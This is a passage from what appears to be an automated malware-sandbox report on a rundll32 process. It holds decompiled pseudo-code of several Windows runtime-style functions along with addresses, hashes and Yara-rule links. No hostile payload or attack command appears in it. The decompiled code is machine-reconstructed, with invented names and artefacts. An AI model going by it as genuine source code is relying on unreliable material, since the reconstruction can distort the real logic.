				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x44fd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04427D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0444B640(E04449AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                0x044d8a62
                                                                                                                0x044d8a71
                                                                                                                0x044d8a79
                                                                                                                0x044d8a82
                                                                                                                0x044d8a85
                                                                                                                0x044d8a89
                                                                                                                0x044d8a8c
                                                                                                                0x044d8a8f
                                                                                                                0x044d8a92
                                                                                                                0x044d8a95
                                                                                                                0x044d8a9f
                                                                                                                0x044d8ab1
                                                                                                                0x044d8aa1
                                                                                                                0x044d8aaa
                                                                                                                0x044d8aaa
                                                                                                                0x044d8abc
                                                                                                                0x044d8abd
                                                                                                                0x044d8abf
                                                                                                                0x044d8ac4
                                                                                                                0x044d8ada

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 668b61bb77af10b1d32720b92f2d649a3a380ae858f8d74f9c965ef372b33ba6
                                                                                                                • Instruction ID: a3fc7714421c524637f300cae36ef7ad4b5fc2927ad2730d7fd8ee5763e51c12
                                                                                                                • Opcode Fuzzy Hash: 668b61bb77af10b1d32720b92f2d649a3a380ae858f8d74f9c965ef372b33ba6
                                                                                                                • Instruction Fuzzy Hash: 87011AB1A00219AFDF00DFA9D9419AEB7B8EF88310F50405BF905E7341EA34A9018BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440DB60 Relevance: .0, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0440DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0440DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0440E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0440E8B0(__ecx, _t14, 0xfff);
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                                0x0440db64
                                                                                                                0x0440db66
                                                                                                                0x0440db6b
                                                                                                                0x0440dbaa
                                                                                                                0x0440db71
                                                                                                                0x0440db76
                                                                                                                0x0440db7a
                                                                                                                0x0440dba3
                                                                                                                0x0440db7c
                                                                                                                0x0440db87
                                                                                                                0x0440db8b
                                                                                                                0x04464fa1
                                                                                                                0x04464fb3
                                                                                                                0x04464fb8
                                                                                                                0x0440db91
                                                                                                                0x0440db96
                                                                                                                0x0440db98
                                                                                                                0x0440db98
                                                                                                                0x0440db8b
                                                                                                                0x0440db7a
                                                                                                                0x0440db9d
                                                                                                                0x0440dba2

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                • Instruction ID: bf9ae8fb21e9ac081a626e01cf5efdf2bd01931c84c831d04837ca5cf0ed523d
                                                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                • Instruction Fuzzy Hash: 20F04C73A005229FEF322ADA4880F17F6B58FC1A60F15443BF2059B3C5C974BC2692D1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440B1E1 Relevance: .0, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0440B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04427D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04427D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04487016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                                0x0440b1e8
                                                                                                                0x0440b1ea
                                                                                                                0x0440b1f3
                                                                                                                0x04464a17
                                                                                                                0x0440b1f9
                                                                                                                0x0440b1f9
                                                                                                                0x0440b1f9
                                                                                                                0x0440b201
                                                                                                                0x04464a21
                                                                                                                0x04464a2e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04464a3b
                                                                                                                0x04464a4d
                                                                                                                0x04464a3d
                                                                                                                0x04464a46
                                                                                                                0x04464a46
                                                                                                                0x04464a55
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0440b20a
                                                                                                                0x0440b20a
                                                                                                                0x0440b20a
                                                                                                                0x0440b20a

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                • Instruction ID: d394dc846a47a68efd663fae6d95a605413e57fa5e9a78c6df6d22d533d47e56
                                                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                • Instruction Fuzzy Hash: 9D01D632310680ABDF329799C908F6ABB98EF41794F084077F9158B7B2E675FC10D219
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0449FE87 Relevance: .0, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 46%
                                                                                                                			E0449FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x44fd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04427D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0444B640(E04449AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                                0x0449fe96
                                                                                                                0x0449fe9e
                                                                                                                0x0449fea1
                                                                                                                0x0449fead
                                                                                                                0x0449feb3
                                                                                                                0x0449feb9
                                                                                                                0x0449fec3
                                                                                                                0x0449fed5
                                                                                                                0x0449fec5
                                                                                                                0x0449fece
                                                                                                                0x0449fece
                                                                                                                0x0449fee0
                                                                                                                0x0449fee1
                                                                                                                0x0449fee3
                                                                                                                0x0449fee8
                                                                                                                0x0449fefb

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 156bd2d3469ed698afa7ea3694d42f1bd908c5576505cc86400d85627a69ec87
                                                                                                                • Instruction ID: 9860e722b602ead8e42ebcd72499ee963ef23539796adb9f084a11ebb9a3bb65
                                                                                                                • Opcode Fuzzy Hash: 156bd2d3469ed698afa7ea3694d42f1bd908c5576505cc86400d85627a69ec87
                                                                                                                • Instruction Fuzzy Hash: 79016270A00249AFDF14DFA9D542A6EBBF4EF04304F50415AA505EB382DA35ED01DB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D8F6A Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E044D8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x44fd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04427D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0444B640(E04449AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                0x044d8f6a
                                                                                                                0x044d8f79
                                                                                                                0x044d8f81
                                                                                                                0x044d8f84
                                                                                                                0x044d8f8b
                                                                                                                0x044d8f91
                                                                                                                0x044d8f94
                                                                                                                0x044d8f9e
                                                                                                                0x044d8fb0
                                                                                                                0x044d8fa0
                                                                                                                0x044d8fa9
                                                                                                                0x044d8fa9
                                                                                                                0x044d8fbb
                                                                                                                0x044d8fbc
                                                                                                                0x044d8fbe
                                                                                                                0x044d8fc3
                                                                                                                0x044d8fd6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 769555909888820685baa0a962b82ee0359fd5c20179dd4458f71510b12632a5
                                                                                                                • Instruction ID: 2666ed0596b62548dc2d2754e603c6cb4862437553bde93bbd17cd4952135a47
                                                                                                                • Opcode Fuzzy Hash: 769555909888820685baa0a962b82ee0359fd5c20179dd4458f71510b12632a5
                                                                                                                • Instruction Fuzzy Hash: 0F013C74A00248AFEF04EFB9D545AAEB7B4EF48300F50405AB915EB381EA34EA00DB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044C131B Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E044C131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x44fd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04427D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0444B640(E04449AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                0x044c131b
                                                                                                                0x044c132a
                                                                                                                0x044c1330
                                                                                                                0x044c1336
                                                                                                                0x044c133e
                                                                                                                0x044c1341
                                                                                                                0x044c1344
                                                                                                                0x044c134f
                                                                                                                0x044c1361
                                                                                                                0x044c1351
                                                                                                                0x044c135a
                                                                                                                0x044c135a
                                                                                                                0x044c136c
                                                                                                                0x044c136d
                                                                                                                0x044c136f
                                                                                                                0x044c1374
                                                                                                                0x044c1387

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 44d830f0e565437667d65516f1ece4cc5f4074d7e0fc492d217559ba73c823d3
                                                                                                                • Instruction ID: c37b3a84542cffd38e9d6ed33a399a81a7bca9fabd1dec0d17f614ab826020c0
                                                                                                                • Opcode Fuzzy Hash: 44d830f0e565437667d65516f1ece4cc5f4074d7e0fc492d217559ba73c823d3
                                                                                                                • Instruction Fuzzy Hash: 6B018170E00248AFEF40DFA9D505AAEB7F4FF48300F40405AB845EB392EA34EA00CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044C1608 Relevance: .0, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 46%
                                                                                                                			E044C1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x44fd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04427D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0444B640(E04449AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                                                0x044c1608
                                                                                                                0x044c1617
                                                                                                                0x044c161d
                                                                                                                0x044c1625
                                                                                                                0x044c1628
                                                                                                                0x044c162b
                                                                                                                0x044c1636
                                                                                                                0x044c1648
                                                                                                                0x044c1638
                                                                                                                0x044c1641
                                                                                                                0x044c1641
                                                                                                                0x044c1653
                                                                                                                0x044c1654
                                                                                                                0x044c1656
                                                                                                                0x044c165b
                                                                                                                0x044c166e

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ef264ee953db5991796f491a45d42998bf3bc6b2416055bb46c576bd80103ffa
                                                                                                                • Instruction ID: 6558d98d06cf2fbac391a13b00eb5ac4b84fa51c8b896c0d8500cbfaf79bcc00
                                                                                                                • Opcode Fuzzy Hash: ef264ee953db5991796f491a45d42998bf3bc6b2416055bb46c576bd80103ffa
                                                                                                                • Instruction Fuzzy Hash: D4F04F71E00258AFEF14DFA9D505A6EB7B4EF44300F44405AA905EB382EA34A900CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0442C577 Relevance: .0, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0442C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0442C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x43e11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E044D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                                0x0442c577
                                                                                                                0x0442c57d
                                                                                                                0x0442c581
                                                                                                                0x0442c5b5
                                                                                                                0x0442c5b9
                                                                                                                0x0442c5ce
                                                                                                                0x0442c5ce
                                                                                                                0x0442c5ca
                                                                                                                0x00000000
                                                                                                                0x0442c5ca
                                                                                                                0x0442c5c4
                                                                                                                0x0442c5c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0442c5ad
                                                                                                                0x00000000
                                                                                                                0x0442c5af

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9d7971d831bb4073559bea5a9d27281dd65a0303f654d3bd09bb0a9a55f039cd
                                                                                                                • Instruction ID: 82387bc6effe0d7abd27433a1ae40381b540120dba25d03d519e42d82977de0b
                                                                                                                • Opcode Fuzzy Hash: 9d7971d831bb4073559bea5a9d27281dd65a0303f654d3bd09bb0a9a55f039cd
                                                                                                                • Instruction Fuzzy Hash: D8F090B29156B2DEEF359B148284B2B7BD49B05774FC4446BE41587346C6A4F8C0C251
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D8D34 Relevance: .0, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E044D8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x44fd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04427D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0444B640(E04449AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                0x044d8d34
                                                                                                                0x044d8d43
                                                                                                                0x044d8d4b
                                                                                                                0x044d8d4e
                                                                                                                0x044d8d52
                                                                                                                0x044d8d5c
                                                                                                                0x044d8d6e
                                                                                                                0x044d8d5e
                                                                                                                0x044d8d67
                                                                                                                0x044d8d67
                                                                                                                0x044d8d79
                                                                                                                0x044d8d7a
                                                                                                                0x044d8d7c
                                                                                                                0x044d8d81
                                                                                                                0x044d8d94

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 10a97247e0bbf999c59e8a757d80fdd9c527873d2b95ae73c9ca935d52e9b4fd
                                                                                                                • Instruction ID: 95275a59d599b62990172b843f669026f8ceef3c9912b76d2e01f0c4746d2eab
                                                                                                                • Opcode Fuzzy Hash: 10a97247e0bbf999c59e8a757d80fdd9c527873d2b95ae73c9ca935d52e9b4fd
                                                                                                                • Instruction Fuzzy Hash: 81F09070E046489FEF14EBB9D542A6E77B4EB44700F50809AE916AB281EA34E9008754
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044C2073 Relevance: .0, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E044C2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E044BFD22(__ecx);
				_t19 =  *0x44f849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x44f8748; // 0x0
					if(__eflags <= 0) {
						E044C1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x44f8724 & 0x00000004;
							if(( *0x44f8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x44f8724; // 0x0
					return E044B8DF1(__ebx, 0xc0000374, 0x44f5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                                0x044c2076
                                                                                                                0x044c2078
                                                                                                                0x044c207d
                                                                                                                0x044c2083
                                                                                                                0x044c20a4
                                                                                                                0x044c20aa
                                                                                                                0x044c20ac
                                                                                                                0x044c20b7
                                                                                                                0x044c20ba
                                                                                                                0x044c20bc
                                                                                                                0x044c20c9
                                                                                                                0x044c20c9
                                                                                                                0x044c20d0
                                                                                                                0x044c20d2
                                                                                                                0x00000000
                                                                                                                0x044c20d2
                                                                                                                0x044c20be
                                                                                                                0x044c20c3
                                                                                                                0x044c20c5
                                                                                                                0x044c20c7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044c20c7
                                                                                                                0x044c20bc
                                                                                                                0x044c20d4
                                                                                                                0x044c2085
                                                                                                                0x044c2085
                                                                                                                0x044c20a3
                                                                                                                0x044c20a3

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e184d8d12e1cb2cc1404b29904c0472c701a7ca140134253bb12a0724fc7d26a
                                                                                                                • Instruction ID: 3bf7f1586cc43b34a415e9fdb7abee4d8f87f8966b3d24451581dde3d4380c30
                                                                                                                • Opcode Fuzzy Hash: e184d8d12e1cb2cc1404b29904c0472c701a7ca140134253bb12a0724fc7d26a
                                                                                                                • Instruction Fuzzy Hash: DAF0822E8155844AFF62AF2769013D26BD4E745214F0D048FD6905B302C6F8A893CA60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0444927A Relevance: .0, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 54%
                                                                                                                			E0444927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0444FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E044492C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                                0x04449295
                                                                                                                0x04449299
                                                                                                                0x0444929f
                                                                                                                0x044492aa
                                                                                                                0x044492ad
                                                                                                                0x044492ae
                                                                                                                0x044492af
                                                                                                                0x044492b0
                                                                                                                0x044492b4
                                                                                                                0x044492bb
                                                                                                                0x044492bb
                                                                                                                0x044492c5

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                • Instruction ID: 59758e3187be2594f6c80fd289eadd328092f15b7d832d986c64577a3197b19d
                                                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                • Instruction Fuzzy Hash: F1E06D722406406BFB219E5ADC84B5776A9EFC2725F04447EB9045E283CAE6E9098BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0442746D Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
